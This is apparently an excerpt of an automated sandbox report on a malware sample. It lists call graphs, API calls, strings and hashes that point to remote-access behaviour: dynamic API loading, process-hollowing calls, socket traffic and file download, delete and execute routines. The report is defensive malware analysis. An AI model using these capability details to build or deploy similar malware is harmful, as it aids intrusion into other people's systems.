47384->47385 47385->47029 47387 44f0eb 47386->47387 47388 44f0e2 47386->47388 47387->47033 47391 44efd8 48 API calls 5 library calls 47388->47391 47390->47033 47391->47387 47393 41cc20 LoadLibraryA GetProcAddress 47392->47393 47394 41cc10 GetModuleHandleA GetProcAddress 47392->47394 47395 41cc49 44 API calls 47393->47395 47396 41cc39 LoadLibraryA GetProcAddress 47393->47396 47394->47393 47395->47037 47396->47395 47569 41b539 FindResourceA 47397->47569 47401 40f428 ctype 47581 4020b7 47401->47581 47404 401fe2 28 API calls 47405 40f44e 47404->47405 47406 401fd8 11 API calls 47405->47406 47407 40f457 47406->47407 47408 43bda0 _Yarn 21 API calls 47407->47408 47409 40f468 ctype 47408->47409 47587 406e13 47409->47587 47411 40f49b 47411->47039 47413 40210c 47412->47413 47414 4023ce 11 API calls 47413->47414 47415 402126 47414->47415 47416 402569 28 API calls 47415->47416 47417 402134 47416->47417 47417->47042 47624 4020df 47418->47624 47420 401fd8 11 API calls 47421 41bf61 47420->47421 47422 401fd8 11 API calls 47421->47422 47425 41bf69 47422->47425 47423 41bf31 47630 4041a2 28 API calls 47423->47630 47427 401fd8 11 API calls 47425->47427 47431 40ea5f 47427->47431 47428 41bf3d 47429 401fe2 28 API calls 47428->47429 47432 41bf46 47429->47432 47430 401fe2 28 API calls 47438 41bebf 47430->47438 47440 40fb52 47431->47440 47433 401fd8 11 API calls 47432->47433 47435 41bf4e 47433->47435 47434 401fd8 11 API calls 47434->47438 47631 41cec5 28 API calls 47435->47631 47438->47423 47438->47430 47438->47434 47439 41bf2f 47438->47439 47628 4041a2 28 API calls 47438->47628 47629 41cec5 28 API calls 47438->47629 47439->47420 47441 40fb5e 47440->47441 47443 40fb65 47440->47443 47632 402163 11 API calls 47441->47632 47443->47047 47445 402163 47444->47445 47446 40219f 47445->47446 47633 402730 11 API calls 47445->47633 47446->47049 47448 402184 47634 402712 11 API calls std::_Deallocate 47448->47634 47450->47054 47451->47059 47452->47062 47453->47067 47455 401ff1 47454->47455 47462 402039 47454->47462 47456 4023ce 11 API calls 47455->47456 47457 401ffa 47456->47457 47458 40203c 47457->47458 47460 402015 47457->47460 47636 40267a 11 API calls 47458->47636 47635 403098 28 API calls 47460->47635 47463 401fd8 47462->47463 47464 4023ce 11 API calls 47463->47464 47465 401fe1 47464->47465 47465->47074 47466->47078 47467->47080 47468->47082 47469->47084 47470->47091 47637 401fab 47471->47637 47473 40d0ae CreateMutexA GetLastError 47473->47096 47474->47055 47475->47057 47476->47063 47477->47066 47479->47088 47480->47101 47481->47104 47482->47092 47483->47102 47484->47112 47485->47121 47486->47114 47487->47129 47488->47105 47489->47111 47490->47120 47491->47127 47492->47130 47493->47135 47494->47140 47495->47145 47496->47150 47497->47152 47498->47154 47499->47161 47500->47167 47501->47172 47502->47179 47503->47183 47504->47187 47505->47160 47506->47166 47507->47171 47508->47176 47509->47184 47510->47188 47511->47192 47512->47199 47513->47203 47514->47208 47515->47211 47516->47173 47517->47177 47518->47185 47519->47193 47520->47195 47521->47198 47522->47204 47523->47207 47524->47212 47525->47215 47526->47217 47527->47219 47528->47221 47529->47223 47530->47225 47531->47227 47532->47229 47533->47231 47534->47234 47535->47236 47536->47239 47537->47242 47538->47244 47539->47248 47540->47250 47541->47252 47542->47256 47543->47262 47544->47270 47545->47275 47546->47282 47547->47258 47548->47264 47549->47272 47550->47283 47551->47257 47552->47263 47553->47266 47554->47271 47555->47287 47557->47291 47558->47295 47559->47300 47560->47302 47561->47110 47563->47126 47564->47134 47565->47139 47566->47143 47567->47146 47638 41ada8 103 API calls 47568->47638 47570 41b556 LoadResource LockResource SizeofResource 47569->47570 47571 40f419 47569->47571 47570->47571 47572 43bda0 47571->47572 47573 4461b8 47572->47573 47574 4461f6 47573->47574 47576 4461e1 HeapAlloc 47573->47576 47579 4461ca __Getctype 47573->47579 47591 44062d 20 API calls __dosmaperr 47574->47591 47577 4461f4 47576->47577 47576->47579 47578 4461fb 47577->47578 47578->47401 47579->47574 47579->47576 47590 443001 7 API calls 2 library calls 47579->47590 47582 4020bf 47581->47582 47592 4023ce 47582->47592 47584 4020ca 47596 40250a 47584->47596 47586 4020d9 47586->47404 47588 4020b7 28 API calls 47587->47588 47589 406e27 47588->47589 47589->47411 47590->47579 47591->47578 47593 402428 47592->47593 47594 4023d8 47592->47594 47593->47584 47594->47593 47603 4027a7 11 API calls std::_Deallocate 47594->47603 47597 40251a 47596->47597 47598 402520 47597->47598 47599 402535 47597->47599 47604 402569 47598->47604 47614 4028e8 28 API calls 47599->47614 47602 402533 47602->47586 47603->47593 47615 402888 47604->47615 47606 40257d 47607 402592 47606->47607 47608 4025a7 47606->47608 47620 402a34 22 API calls 47607->47620 47622 4028e8 28 API calls 47608->47622 47611 40259b 47621 4029da 22 API calls 47611->47621 47613 4025a5 47613->47602 47614->47602 47617 402890 47615->47617 47616 402898 47616->47606 47617->47616 47623 402ca3 22 API calls 47617->47623 47620->47611 47621->47613 47622->47613 47625 4020e7 47624->47625 47626 4023ce 11 API calls 47625->47626 47627 4020f2 47626->47627 47627->47438 47628->47438 47629->47438 47630->47428 47631->47439 47632->47443 47633->47448 47634->47446 47635->47462 47636->47462 47646 412829 61 API calls 47644->47646 47648 443248 _abort 47647->47648 47649 443396 _abort GetModuleHandleW 47648->47649 47657 443260 47648->47657 47651 443254 47649->47651 47651->47657 47681 4433da GetModuleHandleExW 47651->47681 47652 443268 47656 4432dd 47652->47656 47668 443306 47652->47668 47689 443ff0 20 API calls _abort 47652->47689 47660 4432f5 47656->47660 47690 444276 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47656->47690 47669 445909 EnterCriticalSection 47657->47669 47658 443323 47673 443355 47658->47673 47659 44334f 47692 4577a9 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47659->47692 47691 444276 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47660->47691 47670 443346 47668->47670 47669->47652 47693 445951 LeaveCriticalSection 47670->47693 47672 44331f 47672->47658 47672->47659 47694 448d49 47673->47694 47676 443383 47679 4433da _abort 8 API calls 47676->47679 47677 443363 GetPEB 47677->47676 47678 443373 GetCurrentProcess TerminateProcess 47677->47678 47678->47676 47680 44338b ExitProcess 47679->47680 47682 443404 GetProcAddress 47681->47682 47683 443427 47681->47683 47684 443419 47682->47684 47685 443436 47683->47685 47686 44342d FreeLibrary 47683->47686 47684->47683 47687 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47685->47687 47686->47685 47688 443440 47687->47688 47688->47657 47689->47656 47690->47660 47691->47668 47693->47672 47695 448d6e 47694->47695 47697 448d64 47694->47697 47700 44854a 47695->47700 47698 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47697->47698 47699 44335f 47698->47699 47699->47676 47699->47677 47701 448576 47700->47701 47702 44857a 47700->47702 47701->47702 47706 44859a 47701->47706 47707 4485e6 47701->47707 47702->47697 47704 4485a6 GetProcAddress 47705 4485b6 __crt_fast_encode_pointer 47704->47705 47705->47702 47706->47702 47706->47704 47708 448607 LoadLibraryExW 47707->47708 47711 4485fc 47707->47711 47709 448624 GetLastError 47708->47709 47710 44863c 47708->47710 47709->47710 47712 44862f LoadLibraryExW 47709->47712 47710->47711 47713 448653 FreeLibrary 47710->47713 47711->47701 47712->47710 47713->47711

                                  Executed Functions

                                  Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                  • API String ID: 4236061018-3687161714
                                  • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                  • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                  • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                  • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                                  Function 00443355 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG,004461B7,00000003), ref: 00443376
                                  • TerminateProcess.KERNEL32(00000000), ref: 0044337D
                                  • ExitProcess.KERNEL32 ref: 0044338F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CurrentExitTerminate
                                  • String ID: PkGNG
                                  • API String ID: 1703294689-263838557
                                  • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                  • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                  • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                  • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                  Function 00404E26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 65synchronizationCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                  • SetEvent.KERNEL32(?), ref: 00404E43
                                  • CloseHandle.KERNEL32(?), ref: 00404E4C
                                  • closesocket.WS2_32(?), ref: 00404E5A
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                  • SetEvent.KERNEL32(?), ref: 00404EA2
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                  • SetEvent.KERNEL32(?), ref: 00404EBA
                                  • CloseHandle.KERNEL32(?), ref: 00404EBF
                                  • CloseHandle.KERNEL32(?), ref: 00404EC4
                                  • SetEvent.KERNEL32(?), ref: 00404ED1
                                  • CloseHandle.KERNEL32(?), ref: 00404ED6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                  • String ID: PkGNG
                                  • API String ID: 3658366068-263838557
                                  • Opcode ID: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                  • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                  • Opcode Fuzzy Hash: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                  • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                  Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 30 4485e6-4485fa 31 448607-448622 LoadLibraryExW 30->31 32 4485fc-448605 30->32 33 448624-44862d GetLastError 31->33 34 44864b-448651 31->34 35 44865e-448660 32->35 36 44863c 33->36 37 44862f-44863a LoadLibraryExW 33->37 38 448653-448654 FreeLibrary 34->38 39 44865a 34->39 40 44863e-448640 36->40 37->40 38->39 41 44865c-44865d 39->41 40->34 42 448642-448649 40->42 41->35 42->41
                                  APIs
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                  • GetLastError.KERNEL32(?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad$ErrorLast
                                  • String ID:
                                  • API String ID: 3177248105-0
                                  • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                  • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                  • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                  • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                  Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 43 40d0a4-40d0d0 call 401fab CreateMutexA GetLastError
                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                  • GetLastError.KERNEL32 ref: 0040D0BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateErrorLastMutex
                                  • String ID: SG
                                  • API String ID: 1925916568-3189917014
                                  • Opcode ID: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                  • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                  • Opcode Fuzzy Hash: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                  • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                  Function 0044854A Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 46 44854a-448574 47 448576-448578 46->47 48 4485df 46->48 49 44857e-448584 47->49 50 44857a-44857c 47->50 51 4485e1-4485e5 48->51 52 448586-448588 call 4485e6 49->52 53 4485a0 49->53 50->51 56 44858d-448590 52->56 55 4485a2-4485a4 53->55 57 4485a6-4485b4 GetProcAddress 55->57 58 4485cf-4485dd 55->58 59 4485c1-4485c7 56->59 60 448592-448598 56->60 61 4485b6-4485bf call 434591 57->61 62 4485c9 57->62 58->48 59->55 60->52 63 44859a 60->63 61->50 62->58 63->53
                                  APIs
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004485AA
                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc__crt_fast_encode_pointer
                                  • String ID:
                                  • API String ID: 2279764990-0
                                  • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                  • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                  • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                  • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                  Function 00450154 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 80 450154-450161 call 445b74 82 450166-450171 80->82 83 450177-45017f 82->83 84 450173-450175 82->84 85 4501bf-4501cd call 446802 83->85 86 450181-450185 83->86 84->85 88 450187-4501b9 call 448b04 86->88 92 4501bb-4501be 88->92 92->85
                                  APIs
                                    • Part of subcall function 00445B74: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000), ref: 00445BB5
                                  • _free.LIBCMT ref: 004501C0
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap_free
                                  • String ID:
                                  • API String ID: 614378929-0
                                  • Opcode ID: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                  • Instruction ID: 1bf88885f7a62dfe3e195aa205353632c6f85cb380d5d404dcdd82bf2c99678c
                                  • Opcode Fuzzy Hash: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                  • Instruction Fuzzy Hash: DB014976200744ABE731CF6ACC42D5AFBD8EB85370F25062EE58483281EB34A909C779
                                  Function 00445B74 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 93 445b74-445b7f 94 445b81-445b8b 93->94 95 445b8d-445b93 93->95 94->95 96 445bc1-445bcc call 44062d 94->96 97 445b95-445b96 95->97 98 445bac-445bbd RtlAllocateHeap 95->98 102 445bce-445bd0 96->102 97->98 99 445bbf 98->99 100 445b98-445b9f call 4455c6 98->100 99->102 100->96 106 445ba1-445baa call 443001 100->106 106->96 106->98
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000), ref: 00445BB5
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                  • Instruction ID: ef76d3429b2572ee2e16b707a9c356192af24cfd4e901c13b73aaad13af6506a
                                  • Opcode Fuzzy Hash: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                  • Instruction Fuzzy Hash: BEF0B431500F65ABBF222E22AC05E5B3769DB81770B14412BB914EA286CA38FC0186AC

                                  Non-executed Functions

                                  Function 00407CD2 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                  • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                    • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                    • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                    • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                  • DeleteFileA.KERNEL32(?), ref: 0040868D
                                    • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                    • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                    • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                    • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                  • Sleep.KERNEL32(000007D0), ref: 00408733
                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                    • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                  • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                  • API String ID: 1067849700-181434739
                                  • Opcode ID: f676259c62b52cfccf94f92d8d960cb361a95eefcbcfe61b4d852a774d262317
                                  • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                  • Opcode Fuzzy Hash: f676259c62b52cfccf94f92d8d960cb361a95eefcbcfe61b4d852a774d262317
                                  • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                  Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                  Download Yara Rule
                                  APIs
